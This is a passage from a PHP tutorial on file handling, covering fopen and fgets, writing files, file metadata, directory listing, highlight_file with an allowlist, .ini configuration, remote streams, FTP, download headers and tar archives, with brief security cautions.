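fopen returns FALSE when a file can't be opened, so in practice it's worth checking the handle before reading from it. Here's a minimal sketch of the same read with that check added. The readWholeFile helper and the temporary demo file are assumptions made for illustration; they aren't part of fileHandle.php:

```php
<?php
// Hypothetical helper: returns the file's contents, or FALSE on failure
function readWholeFile($location)
{
  if (!is_readable($location))
  {
    return false;
  }
  $fp = fopen($location, 'rb');
  if ($fp === false)
  {
    return false;
  }
  $size = filesize($location);
  // fread needs a length greater than zero, so treat an empty file specially
  $contents = ($size > 0) ? fread($fp, $size) : '';
  fclose($fp);
  return $contents;
}

// Demo with a throwaway file in the system's temporary directory
$demoFile = tempnam(sys_get_temp_dir(), 'fh');
file_put_contents($demoFile, "Hello, file handles!\n");
$demoContents = readWholeFile($demoFile);
echo $demoContents;
unlink($demoFile);
```

Returning FALSE rather than calling die leaves the caller free to decide how to react to a missing or unreadable file.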

      Handling Larger Files
      The previous solution is fine for small files. However, when it’s reading all the
      contents of a large file, PHP will be forced to fill a lot of memory with those contents,
      possibly causing a performance issue. To alleviate the potential for this problem,
      we take a different approach to reading the contents of a large file—we read the file
      in chunks, and operate on each chunk as we go:

                                                                      fileHandle2.php (excerpt)

       <?php
       $fp = fopen('writeSecureScripts.html', 'rb');
       while (!feof($fp)) {
         $chunk = fgets($fp);
         echo $chunk;
       }
       fclose($fp);
       ?>



      In our example, the file is opened as normal. Next, to read the contents of the file,
      we use a while loop, which continues so long as the feof function returns FALSE.
      feof returns TRUE if the end of the file has been reached, or if there’s an error with
      the file handle (such as a loss of connection, which can occur with remote files).

Next, we use fgets to fetch a “chunk” of the file, beginning at the current location
and running to the next line-feed character. We get the string back, and fgets moves
the internal PHP file pointer for the file handle forward accordingly.
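fgets suits line-oriented text, but a binary file may contain no line feeds at all, in which case a single call could return most of the file. The same loop can use fread with a fixed chunk size instead. This is only a sketch: the countBytes helper, the 8192-byte chunk size, and the temporary demo file are assumptions chosen for illustration:

```php
<?php
// Hypothetical helper: walks through a file in fixed-size chunks and
// returns the total number of bytes read, or FALSE if it can't be opened
function countBytes($location, $chunkSize = 8192)
{
  $fp = fopen($location, 'rb');
  if ($fp === false)
  {
    return false;
  }
  $total = 0;
  while (!feof($fp))
  {
    $chunk = fread($fp, $chunkSize);
    if ($chunk === false)
    {
      break; // read error
    }
    // Operate on $chunk here; only one chunk is held in memory at a time
    $total += strlen($chunk);
  }
  fclose($fp);
  return $total;
}

// Demo with a throwaway 20,000-byte file
$demoFile = tempnam(sys_get_temp_dir(), 'ch');
file_put_contents($demoFile, str_repeat('x', 20000));
$bytesRead = countBytes($demoFile);
echo $bytesRead . " bytes read\n";
unlink($demoFile);
```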

Discussion
Many more functions are available for reading a file using a file handle. One is
fgetss (note the double s), which is almost the same as fgets but strips out any
HTML tags it finds in the same way the strip_tags function would. (fgetss was
removed in PHP 8.0; on current versions, pass the result of fgets to strip_tags
instead.) Another is fscanf, which parses input from the file according to a format
string, in the same way sscanf does. And let’s not forget fgetcsv, which makes
handling CSV (comma-separated values) files a piece of cake. In an idle moment,
it’s well worth browsing the file system functions for goodies.5

But if all you wish to do is read the entire contents of a file into a variable, the file
and file_get_contents functions are easier to use, and offer potentially better
performance.
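To give a flavor of fgetcsv, mentioned above, here's a short sketch that reads a CSV file row by row. The sample data and the temporary file are made up for the example:

```php
<?php
// Create a small CSV file to read (demo data only)
$csvFile = tempnam(sys_get_temp_dir(), 'csv');
file_put_contents($csvFile, "name,language\n\"Smith, Jo\",PHP\nLee,Perl\n");

$rows = array();
$fp = fopen($csvFile, 'rb');
// The delimiter, enclosure, and escape characters are passed explicitly
// rather than relying on the defaults; a length of 0 means "no line limit"
while (($fields = fgetcsv($fp, 0, ',', '"', '\\')) !== false)
{
  $rows[] = $fields;
}
fclose($fp);
unlink($csvFile);

print_r($rows);
```

Each row comes back as an array of fields, and the quoted value "Smith, Jo" survives as a single field even though it contains a comma.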


How do I modify a local file?
Now that you’ve seen how to read the contents of a file and you’re acquainted with
file handles, how about updating files? Again, it’s easy with PHP.

Solution
Take a look at this code:

                                                                      write.php (excerpt)

    <?php
    $lines = file('writeSecureScripts.html');
    $fp = fopen('writeSecureScripts.txt', 'w');
    foreach ($lines as $line) {
      $line = strip_tags($line);
      fwrite($fp, $line);
    }
    fclose($fp);
    echo '<pre>';
    echo file_get_contents('writeSecureScripts.txt');
    echo '</pre>';
    ?>

5
    http://www.php.net/manual/en/ref.filesystem.php




      We use the fwrite function to write a string to a file. Take note of the mode we
      used when we opened the new file with fopen. The mode w will open the file for
      writing, beginning at the very start of the file and overwriting anything that already
      exists. If we’d used a instead, the new contents would have been appended to the
      file, preserving the original contents. In either case, the file will be created if it
      doesn’t already exist.

      For a fast, no-nonsense method for writing to a file, investigate the
      file_put_contents function.6 It’s identical to calling fopen, fwrite, and fclose
      in succession, as we saw in “How do I use file handles?”.
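As a rough sketch of how file_put_contents maps onto the w and a modes described above (the temporary log file is an assumption made for the demo):

```php
<?php
$logFile = tempnam(sys_get_temp_dir(), 'log');

// Without flags, the file is overwritten, like fopen with mode w
file_put_contents($logFile, "first line\n");

// FILE_APPEND behaves like mode a; LOCK_EX requests an exclusive lock
// on the file while the data is written
file_put_contents($logFile, "second line\n", FILE_APPEND | LOCK_EX);

$logContents = file_get_contents($logFile);
echo $logContents;
unlink($logFile);
```

The function returns the number of bytes written, or FALSE on failure, so the result can be checked in the same way as the return value of fwrite.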

      Discussion
      Be aware that on a Unix-based web server, PHP will usually run as a user such as
      www or nobody, an account that has very limited permissions and isn’t owned
      specifically by you. Files that are created by PHP will need to be placed in a directory
      to which that user has write permissions.

      To make a file or directory readable and writable by users other than its owner and group
      (on most setups, that includes the account PHP runs as), use this command:

      chmod o=rw <directory | file>


      If you need to execute the file as well (for instance, it’s a PHP script), use the
      following command:

      chmod o=rwx <directory | file>



                 Protecting Sensitive Files
               If you use a shared server, making directories readable and writable like this means
               that other people with accounts on the server will be able to read and modify the
               contents of those directories. Be careful about the type of information you place
               in them! Your web host should be able to help you address any security concerns.



      6
          http://www.php.net/file_put_contents/


How do I access information about a local file?

PHP comes with a range of functions to help you obtain information about a file.

Solution
In the following example, we use a number of handy functions:

■ file_exists, to check whether the file exists
■ is_file, to check that the file is indeed a file and not a directory
■ is_readable, to check whether the file can be read
■ is_writable, to check whether the file can be written to
■ filemtime, to find the date and time at which the file was last modified
■ fileatime, to find the date and time at which the file was last accessed
■ filesize, to check the file’s size

We also wrap the result in some custom code to make it more readable:

                                                                fileInfo.php (excerpt)

 <?php
 // Function to convert a size in bytes to larger units
 function fileSizeUnit($size)
 {
   if ($size >= 1073741824)
   {
     $size = number_format(($size / 1073741824), 2);
     $unit = 'GB';
   }
   else if ($size >= 1048576)
   {
     $size = number_format(($size / 1048576), 2);
     $unit = 'MB';
   }
   else if ($size >= 1024)
   {
     $size = number_format(($size / 1024), 2);
     $unit = 'KB';
   }
   else if ($size >= 0)
   {
     $unit = 'B';
   }
   else
   {
     $size = '0';
     $unit = 'B';
   }
   return array('size' => $size, 'unit' => $unit);
 }

 $file = 'writeSecureScripts.html';

 // set the default timezone to use. Available since PHP 5.1
 // needed otherwise date() throws an E_STRICT error in v5.2
 date_default_timezone_set('UTC');

 // Does the file exist
 if (file_exists($file))
 {
   echo 'Yep: ' . $file . ' exists.<br />';
 }
 else
 {
   die('Where has: ' . $file . ' gone!<br />');
 }

 // Is it a file? Could be is_dir() for directory
 if (is_file($file))
 {
   echo $file . ' is a file<br />';
 }

 // Is it readable
 if (is_readable($file))
 {
   echo $file . ' can be read<br />';
 }

 // Is it writable
 if (is_writable($file))
 {
   echo $file . ' can be written to<br />';
 }

 // When was it last modified?
 $modified = date("D d M g:i:s", filemtime($file));
 echo $file . ' last modified at ' . $modified . '<br />';

 // When was it last accessed?
 $accessed = date("D d M g:i:s", fileatime($file));
 echo $file . ' last accessed at ' . $accessed . '<br />';

 // Use a more convenient file size
 $size = fileSizeUnit(filesize($file));

 // Display the file size (note the escaped apostrophe)
 echo 'It\'s ' . $size['size'] . ' ' . $size['unit'] .
      ' in size.<br />';
 ?>




Discussion
The fileSizeUnit function we used at the start of this code helps to make the result
of PHP’s filesize function more readable.

PHP keeps a cache of the results of file information functions to improve
performance. Sometimes, though, it will be necessary to clear that cache; we do so using
the clearstatcache function. The output of the code above can be seen in Figure 6.4.




                            Figure 6.4. Retrieving file information
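The cache matters most when a script inspects a file, changes it, and then inspects it again. The following sketch shows where a call to clearstatcache fits in that sequence; the temporary file is an assumption made for the demo:

```php
<?php
$statFile = tempnam(sys_get_temp_dir(), 'st');
file_put_contents($statFile, 'abc');
$sizeBefore = filesize($statFile); // PHP may now cache this result

// Append to the file through a handle
$fp = fopen($statFile, 'ab');
fwrite($fp, 'defgh');
fclose($fp);

// Discard the cached information so the next call re-reads it from disk
clearstatcache();
$sizeAfter = filesize($statFile);

echo $sizeBefore . ' bytes, then ' . $sizeAfter . " bytes\n";
unlink($statFile);
```

Without the call to clearstatcache, the second filesize call could report the stale, cached size.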


      How do I examine directories with PHP?
      When you’re creating web-based file managers in PHP, it’s handy to be able to explore
      the contents of directories.

      Solutions
      There are two basic approaches to examining directories with PHP—you should
      use whichever method you prefer.7

      Using the readdir Function
      The first approach, which uses the opendir, readdir, and closedir functions, is
      similar to the process of using fopen, fread, and fclose to read a file:

                                                                                    readdir.php (excerpt)

          <?php
          $location = './';
          $dp = opendir($location);
          // Compare with FALSE explicitly so that an entry named "0" can't end the loop
          while (false !== ($entry = readdir($dp)))
          {
            if (is_dir($location . $entry))
            {
              echo '[Dir] ' . $entry . '<br />';
            }
            else if (is_file($location . $entry))
            {
              echo '[File] ' . $entry . '<br />';
            }
          }
          closedir($dp);
          ?>




      7
       We’ll discuss a third option later in “How do I work with files using the Standard PHP Library in PHP
      5?”

Using the dir Pseudo-Class
The alternative approach is to use the dir pseudo-class.8 dir is used in a very
similar way to readdir:

                                                                            readdir2.php (excerpt)

    <?php
    $location = './';
    $dir = dir($location);
    // Compare with FALSE explicitly so that an entry named "0" can't end the loop
    while (false !== ($entry = $dir->read()))
    {
      if (is_dir($location . $entry))
      {
        echo '[Dir] ' . $entry . '<br />';
      }
      else if (is_file($location . $entry))
      {
        echo '[File] ' . $entry . '<br />';
      }
    }
    $dir->close();
    ?>
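Both approaches also return the special entries . and .., which a file manager will usually want to skip. Here's one possible way to wrap the readdir loop in a reusable function. The listDirectory name, the shape of the array it returns, and the throwaway demo directory are all assumptions made for this sketch:

```php
<?php
// Hypothetical helper: returns the subdirectories and files in $location,
// or FALSE if the directory can't be opened
function listDirectory($location)
{
  $result = array('dirs' => array(), 'files' => array());
  $dp = opendir($location);
  if ($dp === false)
  {
    return false;
  }
  while (false !== ($entry = readdir($dp)))
  {
    // Skip the special entries for the current and parent directories
    if ($entry == '.' || $entry == '..')
    {
      continue;
    }
    if (is_dir($location . '/' . $entry))
    {
      $result['dirs'][] = $entry;
    }
    else if (is_file($location . '/' . $entry))
    {
      $result['files'][] = $entry;
    }
  }
  closedir($dp);
  // readdir returns entries in no particular order, so sort them
  sort($result['dirs']);
  sort($result['files']);
  return $result;
}

// Demo: build a small throwaway directory, list it, then clean up
$demoDir = sys_get_temp_dir() . '/listdemo_' . uniqid();
mkdir($demoDir);
mkdir($demoDir . '/sub');
file_put_contents($demoDir . '/a.txt', 'a');
$listing = listDirectory($demoDir);
print_r($listing);
unlink($demoDir . '/a.txt');
rmdir($demoDir . '/sub');
rmdir($demoDir);
```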




How do I display PHP
source code online?
Sometimes, you might want to display the source of a file. Maybe you’re making
the code publicly available, but you don’t want to handle downloads. Or you don’t
want to continually update the display page so it remains synchronized with the
actual code (after all, you may be continually improving it). As it turns out, being
a bit lazy isn’t a crime after all.

Solution
PHP provides a very handy function for displaying code: highlight_string, which
displays PHP code in a presentable manner using the formatting defined in php.ini.


8
    dir returns an instance of the Directory class, one of the predefined classes that are built into PHP. You can
read more about predefined classes on the manual page at
http://www.php.net/manual/en/reserved.classes.php.

      Displaying code is even easier with the partner to this function, highlight_file,
      which can simply be passed the name of the file you want to display:

                                                                     highlight.php (excerpt)

       <?php
       // Define an array of allowed files - VERY IMPORTANT!
       $allowed = array('fileInfo.php',
                       'fileGetFunc.php',
                       'fileHandle.php',
                       'fileHandle2.php');
       if (isset($_GET['view']) && in_array($_GET['view'], $allowed))
       {
         highlight_file($_GET['view']);
       }
       else
       {
         $location = './';
         $dir = dir($location);
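         // Compare with FALSE explicitly so that an entry named "0" can't end the loop
         while (false !== ($entry = $dir->read()))
         {
           if (in_array($entry, $allowed))
           {
             // PHP_SELF can contain user-supplied characters, so escape it
             echo '<a href="' . htmlspecialchars($_SERVER['PHP_SELF']) .
                 '?view=' . $entry . '">' . $entry . "</a><br />\n";
           }
         }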
         $dir->close();
       }
       ?>



      In PHP 4.2.0 or later, if you pass a second argument of TRUE to highlight_string
      or highlight_file, the function will return the results as a string rather than
      displaying the file directly.

      The output from highlight.php is shown in Figure 6.5.




                             Figure 6.5. Displaying PHP source code
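Returning the highlighted code as a string is useful when the markup needs to be embedded in a larger page or cached. A brief sketch follows; the sample source string and the listing class name are placeholders rather than anything highlight.php uses:

```php
<?php
$source = '<?php echo "Hello"; ?>';

// With TRUE as the second argument, the highlighted HTML is returned
// instead of being sent straight to the browser
$html = highlight_string($source, true);

// The markup can now be stored, cached, or wrapped in other elements
echo '<div class="listing">' . $html . '</div>';
```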


Discussion
I take care to allow access only to specified files when I’m displaying either directory
contents, or individual file sources. It’s important to be extremely cautious about
the way you display your source code, or you may find yourself giving away more
than you expected, such as the usernames and passwords used to access a database.

Note that hiding code in the interests of security is not what I’m advocating here.
Code should be written to be secure in the first place. Hiding code so that no one
discovers the holes in it is a recipe for disaster. Eventually someone will find out
what you’ve been hiding and—worse still—you’ll probably be ignorant of the fact
that they’re exploiting your lax security.


How do I store configuration
information in a file?
Certain information that’s used repeatedly throughout your site (such as passwords,
paths, and variables) is best stored in a single file. That way, should you need to
move your code to another site, you’ll be able to modify the settings once, rather
than hundreds of times throughout your code.


      Solution
      The easiest way to store configuration information is to create the variables in an
      .ini file, then include this file in your code using the parse_ini_file function,
      which parses files that use the same format as php.ini. Here’s an example .ini file:

                                                                       example.ini (excerpt)

       ; Settings to connect to MySQL
       [Database_Settings]
       host=localhost
       user=littleme
       pass=secret
       dbname=world

       ; Default locations of various files
       [Locations]
       css=/home/littleme/myinc/css
       javascript=/home/littleme/myinc
       images=/home/littleme/image



      This script uses the parse_ini_file function to retrieve values from your .ini file:

                                                                      parseini.php (excerpt)

       <?php
       $iniVars = parse_ini_file('example.ini', TRUE);
       echo '<pre>';
       print_r($iniVars);
       echo $iniVars['Locations']['css'];
       echo '</pre>';
       ?>



      And here’s the output of the script:

       Array
       (
           [Database_Settings] => Array
               (
                   [host] => localhost
                   [user] => littleme
                   [pass] => secret
                   [dbname] => world
               )

           [Locations] => Array
               (
                   [css] => /home/littleme/myinc/css
                   [javascript] => /home/littleme/myinc
                   [images] => /home/littleme/image
               )

       )
       /home/littleme/myinc/css
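Once the settings are in an array, they can be fed to whatever needs them. As an illustration, this sketch turns the Database_Settings section into a PDO connection string. It assumes a MySQL database, writes a throwaway copy of the .ini file so that it's self-contained, and leaves the actual connection commented out:

```php
<?php
// Write a throwaway copy of the settings so the sketch is self-contained
$iniFile = tempnam(sys_get_temp_dir(), 'ini');
file_put_contents($iniFile,
    "[Database_Settings]\nhost=localhost\nuser=littleme\n" .
    "pass=secret\ndbname=world\n");

$iniVars = parse_ini_file($iniFile, TRUE);
unlink($iniFile);
if ($iniVars === false)
{
  die('Unable to read the configuration file');
}

$db = $iniVars['Database_Settings'];
// Assumption: a MySQL database accessed through PDO
$dsn = 'mysql:host=' . $db['host'] . ';dbname=' . $db['dbname'];
echo $dsn . "\n";
// $pdo = new PDO($dsn, $db['user'], $db['pass']);
```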



Discussion
Using an .ini file to store your configuration information offers some advantages
over keeping the information in your PHP files. Sometimes, editing PHP files will
make your users nervous—it may be hard for them to see which settings are editable,
and it may be possible for them to break your script if they change something they
shouldn’t. Also, as the .ini file extension differs from those of your script files, it’s
relatively easy to secure all .ini files with an .htaccess file that contains a simple directive.9


           Configuration File Security
         Generally speaking, it’s best to not store your configuration file in the web root
         directory—especially because it usually contains user and password information.
         Since you can include a file from anywhere within your file system, you might
         as well play it safe: leave it out of hackers’—and Google’s—reach by placing it
         outside the web root directory on your server.

         If you absolutely must store the configuration files in the web root directory, be
         sure to protect them by including a file directive in your .htaccess file to restrict
         who may access the files. For an extra layer of protection, you can also
         encrypt the sensitive data (perhaps using a tool such as
         mcrypt).10




9
    See http://httpd.apache.org/docs/2.0/mod/core.html#files for more information about file directives.
10
     http://www.php.net/mcrypt/


      How do I access a file on a remote server?
      For the most part, PHP can access files on a remote server over the Internet in almost
      exactly the same way as it does local files.

      Solution
      The fopen function can take a URL instead of a file path as its first argument. In
      this example, we open a web page as if we’re opening a file:

                                                                                    urlFopen.php (excerpt)

       <?php
       $fp = fopen('http://www.sitepoint.com/print/758', 'r');
       while (!feof($fp))
       {
         $chunk = fgets($fp);
         echo $chunk;
       }
       fclose($fp);
       ?>



      Discussion
      PHP implemented the use of streams in version 4.3.0 as a way to unify file, network,
      data compression, and other operations into a common set of functions.11 Basically,
      if you can read the data in a linear fashion, you’re using streams.

      The ability to handle both remote and local files as streams is built into the various
      file functions, which certainly makes life easier. The downside is that by allowing
      the handling of remote files as if they’re local, PHP makes it very easy for you to
      unwittingly open your site up to security risks.12




      11
           Learn more about streams at http://www.php.net/stream/.
      12
           You can set the php.ini file setting allow_url_fopen = Off to disable PHP’s ability to open remote
      files if you prefer.

If you choose to not use fopen to open remote files, there are alternatives, including
using cURL13 or sockets.14 Neither option is as simple as using fopen, though they
achieve the same end.
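Whichever route you take, remote reads can fail or stall in ways that local reads rarely do, so it pays to check the result of fopen and to set a timeout. Here's a sketch of one way to do that with a stream context. The readStream helper and the ten-second default are assumptions, and the demo reads a local temporary file so that it runs without a network connection:

```php
<?php
// Hypothetical helper: reads a local path or a URL through the streams layer.
// Returns the contents as a string, or FALSE if the stream can't be opened.
function readStream($location, $timeout = 10)
{
  // The http options apply only to http:// URLs; other streams ignore them
  $context = stream_context_create(array(
    'http' => array('timeout' => $timeout)
  ));
  // @ suppresses the warning fopen raises on failure; we check the result
  $fp = @fopen($location, 'rb', false, $context);
  if ($fp === false)
  {
    return false;
  }
  $contents = '';
  while (!feof($fp))
  {
    $chunk = fgets($fp);
    if ($chunk === false)
    {
      break;
    }
    $contents .= $chunk;
  }
  fclose($fp);
  return $contents;
}

// Demo with a local file; a URL could be passed in exactly the same way
$demoFile = tempnam(sys_get_temp_dir(), 'rs');
file_put_contents($demoFile, "line one\nline two\n");
$streamContents = readStream($demoFile);
echo $streamContents;
unlink($demoFile);
```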


How do I use FTP from PHP?
One of the great things about PHP is the sheer amount of functionality that’s either
built into it, or is only an extension away. File Transfer Protocol (FTP) is a great
example of such functionality.

Solutions
Here are two popular approaches that you can take to using FTP from PHP.

Using PHP’s Built-in FTP Functions
You can use PHP’s FTP functionality to have PHP scripts act as clients to an FTP
server. This can be useful for countless tasks, whether you’re building a web interface
for an FTP file repository, or developing a tool to update your site from your PHP
development environment. In order to use the FTP functions, you’ll need to make
sure your host has enabled PHP’s FTP functionality.

In this example, we use PHP’s FTP functionality to connect to an FTP server and
list the files in a directory:

                                                                      ftp.php (excerpt)

 <?php
 set_time_limit(0);
 $ftpServer = 'localhost';
 $targetDir = '/';
 if (!$fp = ftp_connect($ftpServer, 21, 30))
 {
   die('Connection failed');
 }
 if (!ftp_login($fp, 'anonymous', 'user@domain.com'))
 {
   die('Login failed');
 }
 if (!ftp_chdir($fp, $targetDir))
 {
   die('Unable to change directory to: ' . $targetDir);
 }
 echo "<pre>Current Directory:" . ftp_pwd($fp) .
      "\n\n";
 echo "Files Available:\n";
 $files = ftp_nlist($fp, $targetDir);
 foreach ($files as $file)
 {
   echo $file . "\n";
 }
 echo '</pre>';
 // Close the connection once we've finished with it
 ftp_close($fp);
 ?>

13
     http://www.php.net/curl/
14
     http://www.php.net/sockets/




      Using the PEAR::Net_FTP Class
      PEAR::Net_FTP is a handy class that ensures data is transferred in the correct mode
      (that is, ASCII or binary), and solves issues relating to recursive uploads and
      downloads where we need to transfer a directory and its subdirectories from one
      system to another.

      This example uses PEAR::Net_FTP to connect to the same server as the previous
      example, then downloads a remote directory and its subdirectories:

                                                                     pearftp.php (excerpt)

       <?php
       set_time_limit(0);
       require_once 'Net/FTP.php';
       $ftpServer = 'localhost';
       $ftpUser   = 'anonymous';
       $ftpPass   = 'user@domain.com';
       $localDir = 'import/';
       $remoteDir = '/';
       $ftp = new Net_FTP();
       $ftp->setHostname($ftpServer);
       $ftp->setUsername($ftpUser);
       $ftp->setPassword($ftpPass);
       $ftp->connect();
       $ftp->login();
       $ftp->getExtensionsFile('extensions.ini');
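       // Net_FTP methods return a PEAR_Error object on failure, and an
       // object always evaluates to TRUE, so test the result with PEAR::isError
       $result = $ftp->getRecursive($remoteDir, $localDir);
       if (!PEAR::isError($result))
       {
         echo 'Files transferred successfully';
       }
       else
       {
         echo 'Transfer failed';
       }
       ?>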




Note that the getExtensionsFile method of Net_FTP allows you to specify a file
that defines particular file extensions, such as .gif and .jpg, as binary or ASCII,
ensuring that they will be transferred in the correct manner. The getRecursive
method fetches the contents of the specified remote directory, including its
subdirectories.

Assuming you have permission to place files on the server, you can easily apply
the operation in reverse using the putRecursive method. This can be a helpful tool
for transferring whole projects between your local development system and your
web site, particularly if you’re using PHP from the command line.

With the ability to transfer files correctly based on their extension, Net_FTP also
makes an excellent choice for individual put and get file operations, as it eliminates
the need for you to get the file transfer mode correct.

For more information on this PEAR package, see its documentation.15

Discussion
When you connect to a normal FTP server by any means, the username and password
you provide are sent in clear text to the server. This information can easily be read
by malicious parties using a packet sniffer that’s plugged in anywhere between you
and the server you’re connecting to. Be sure to change your passwords regularly
and, in general, try to avoid FTP when a better alternative is available.

If you have SSH access to your site, there are many free SFTP, or SSH File Transfer
Protocol, clients that you can use to interact with it.16

15
   http://pear.php.net/package/Net_FTP/docs/
16
   Wikipedia provides a list of SFTP clients that makes a good starting point for your research, at
http://en.wikipedia.org/wiki/Comparison_of_FTP_clients#Protocol_support.


      How do I manage file downloads with PHP?
      A fairly common problem faced by developers building sites that will publish files
      for download is the management of those files. Perhaps some of the files should not
      be publicly available. Perhaps you only want to deliver the file after visitors have
      provided their details through a web form. Dealing with downloads may involve
      more than simply storing your file in a public directory and linking to it from your
      site.

      Solution
      The trick to handling downloads with PHP is to use a few special HTTP headers
      and the readfile function:

                                                                     download.php (excerpt)

       <?php
       $fileName = 'example.ini';
       $mimeType = 'application/zip';
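       $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ?
           $_SERVER['HTTP_USER_AGENT'] : '';
       // strpos returns 0 for a match at the very start, so compare with FALSE
       if (strpos($userAgent, 'MSIE 5') !== false or
           strpos($userAgent, 'Opera 7') !== false)
       {
         $mimeType = 'application/x-download';
       }
       header('Content-Disposition: attachment; filename="' . $fileName . '"');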
       header('Content-Type: ' . $mimeType);
       header('Content-Length: ' . filesize($fileName));
       readfile($fileName);
       ?>



      The Content-Disposition header tells the browser to treat the file as a download
      (that is, not to display it in the browser window), and gives it the name of the file.

      The Content-Type header also tells the browser what type of file we’re sending it.
      In most cases, the Content-Type should match the type of file you’re sending;
      however, Internet Explorer 5 and Opera browsers have a bad habit of displaying
      files of recognized types in the browser regardless of the Content-Disposition
      header, so we set the MIME type to the made-up value application/x-download
      for those browsers.

Finally, the Content-Length header tells the browser the size of the file, so that it’s
able to display a download progress bar.


           Send HTTP Headers First!
         Remember that headers must be delivered before any other content is sent to the
         browser.

         Be aware that PHP’s output control functions can be helpful here,17 as they let
         you send pieces of content to the browser in the correct order: you can hold content
         already sent for output by PHP while letting the headers pass through to the
         browser.
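A minimal sketch of that idea: output is buffered with ob_start, a header is set while the content is still being held, and the content is released afterwards. The text being echoed is a placeholder, and the headers_sent check is there only so that the sketch behaves sensibly wherever it's run:

```php
<?php
// Start buffering: output is held by PHP instead of going to the browser
ob_start();

echo 'Content produced before the headers were decided';

// Headers can still be set, because nothing has actually been sent yet
if (!headers_sent())
{
  header('Content-Type: text/plain');
}

// Collect what was buffered and switch buffering off
$buffered = ob_get_clean();

// Release the held content now that the headers are in place
echo $buffered;
```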


Discussion
There’s no perfect solution to this type of problem. Imagine, for example, that people
decide to make copies of the images they bought from you and redistribute those
copies without your knowing. It’s almost impossible to prevent customers from
doing so unless you provide files that have been modified especially for the purpose
of distribution—with the addition of watermarks, for example.

Though there’s no ideal solution to this problem, it’s important to be aware of some
of the different strategies for file distribution:

■	 Send the file via email. This is a good option for small files, but email systems
   can place a limit on the size of files a user can receive, block certain types of
   files, and operate spam filters that can trap your emails.

■	 Provide customers with a unique link that they can use to download the file for
   a limited time, such as a week. If an attempted download fails (for example, the
   customers lose their Internet connection during the download), this strategy
   allows them to try again. A unique, random number can be generated and used in
   the URL for the download. This number corresponds with an entry in a database,
   which expires after a specified time. Such an approach will at least limit the
   number of times the file is downloaded, and should help prevent redistribution
   of the file via the same URL.




17
     http://www.php.net/outcontrol/

      ■	 Provide customers with username and password combinations that they can use
         to log in to the site and download their own files. This approach has proven
         particularly effective for SitePoint’s online library, where it’s used to distribute
         SitePoint books in Adobe’s PDF format. The PDF files are secured with the
         customer’s email address. This discourages customers from redistributing
         the PDF, as it would be obvious which account was used to redistribute the file.

      As I said, there’s no perfect solution to this problem. However, greater protection
      can be achieved if some form of security is built into the file that’s being downloaded,
      such as a password for a document download, a watermark on an image, or a license
      key for a software package.
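The unique-link strategy described above could be sketched along the following lines. Everything here is hypothetical: the two helper functions, the array standing in for a database row, and the download.php?token= URL format. The sketch also assumes PHP 7 or later, which provides random_bytes:

```php
<?php
// Hypothetical helper: creates the record for a time-limited download link.
// In a real application, the record would be saved in a database table.
function createDownloadToken($fileName, $lifetime, $now)
{
  return array(
    // Assumption: PHP 7 or later, which provides random_bytes
    'token'   => bin2hex(random_bytes(16)),
    'file'    => $fileName,
    'expires' => $now + $lifetime
  );
}

// Hypothetical helper: checks a token taken from the URL against the record
function isTokenValid($record, $token, $now)
{
  return hash_equals($record['token'], $token) && $now <= $record['expires'];
}

$now    = time();
$record = createDownloadToken('example.ini', 7 * 24 * 60 * 60, $now);
$link   = 'download.php?token=' . $record['token'];
echo $link . "\n";

// Valid within the week, but rejected eight days (691200 seconds) later
var_dump(isTokenValid($record, $record['token'], $now));
var_dump(isTokenValid($record, $record['token'], $now + 691200));
```

The download script would look the token up, confirm that it hasn't expired, and only then send the headers and call readfile.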


      How do I create compressed
      ZIP/TAR files with PHP?
      Perhaps you have a directory that contains many files, or different types of files, as
      well as subdirectories. There may well be situations in which you need to create a
      download of the whole directory that preserves its original structure. The typical
      command-line approach to creating such a download on Unix-based systems is first
      to create an “archive” file such as a .tar file (.tar files are “Tape Archives” and
      were originally conceived to help back up a file system onto tape), then compress
      that file with the gzip or bzip2 utilities.

      Solutions
      On a *nix-based system, you’d usually use the tar functionality available through
      the command line to create these files. Using PHP’s system function, you could
      execute these commands from a PHP script, assuming your web server had
      permission to use the tar and gzip or bzip2 executables. However, your server probably
      won’t have these permissions, so in this solution, we chose to use the
      PEAR::Archive_Tar package instead. This package allows you to create archives
      from data stored in your database, or from nodes in an XML document, as well as
      to handle basic files.


       Watch Out for E_STRICT Errors
      The PEAR::Archive_Tar package was originally developed with PHP 4. If you
      use it in PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors
      for the deprecated use of references when passing objects.


Compressing Simple Files
In this example, we create an archive file using the Archive_Tar class and add files
to it. Then we do the reverse—extract all the files we added:

                                                                         tar.php (excerpt)

 <?php
 require_once 'Archive/Tar.php';
 $tar = new Archive_Tar('demo.tar.gz', 'gz');
 $files = array(
   'example.ini',
   'writeSecureScripts.html'
 );
 $tar->create($files);
 echo 'Archive created';

 $tar2 = new Archive_Tar('demo.tar.gz');
 $tar2->extract('demo');
 echo 'Archive extracted';
 ?>



This code is fairly straightforward. When we’re instantiating the class, the second
argument to the constructor function tells Archive_Tar which type of compression
to use (the alternative to gz, which is used for gzip compression, is bz2, used for
bzip2 compression). Simply omit the second argument if you don’t require
compression. The array of filenames needs to be specified when you use the create method,
keeping the file paths relative to the location at which the script is executed. And
that’s it for file compression!

The process of extraction is actually easier. We call the extract method, and provide
a path (again, one that’s relative to the location of the script) to indicate the location
to which the method should extract the archive—in this case, the subdirectory demo.
It’s nice and easy!

      Compressing Database Data
      Archive_Tar is particularly interesting in that it allows strings to be added to the
      archive as files. This hypothetical example demonstrates the archiving of a web
      site’s database of articles—all the articles are retrieved from the database and the
      body text of each article is stored in a text file with a filename that matches the
      article’s ID:

                                                                           tar2.php (excerpt)

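       <?php
       require_once 'Archive/Tar.php';
       // PDO expects a DSN string followed by the credentials.
       // Assumption: a MySQL database, with the DB* constants defined elsewhere
       $db = new PDO('mysql:host=' . DBHOST . ';dbname=' . DBNAME,
           DBUSER, DBPASS);
       $tar = new Archive_Tar('demo/articles.tar.gz', 'gz');
       $sql = "SELECT article_id, body FROM articles";
       foreach($db->query($sql) as $row)
       {
         $tar->addString('articles/' . $row['article_id'] . '.txt',
             $row['body']);
       }
       echo 'Article archive created';
       ?>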



      Here, we’ve queried a database using the PDO class available in PHP 5, and used the
      addString method to add some of the data we fetched to the archive as files.

      The first argument represents the path and filename under which the string should
      be stored; the second is the string itself. That should give you a general idea of when
      Archive_Tar can be useful to you.


      How do I work with files using the Standard
      PHP Library in PHP 5?
      With the release of PHP 5, we were given access to the SPL (Standard PHP Library).
      The SPL is a library of classes and interfaces designed to solve a variety of standard
      problems. As you may have guessed, reading directories and getting information
      about the files they contain is one such problem.

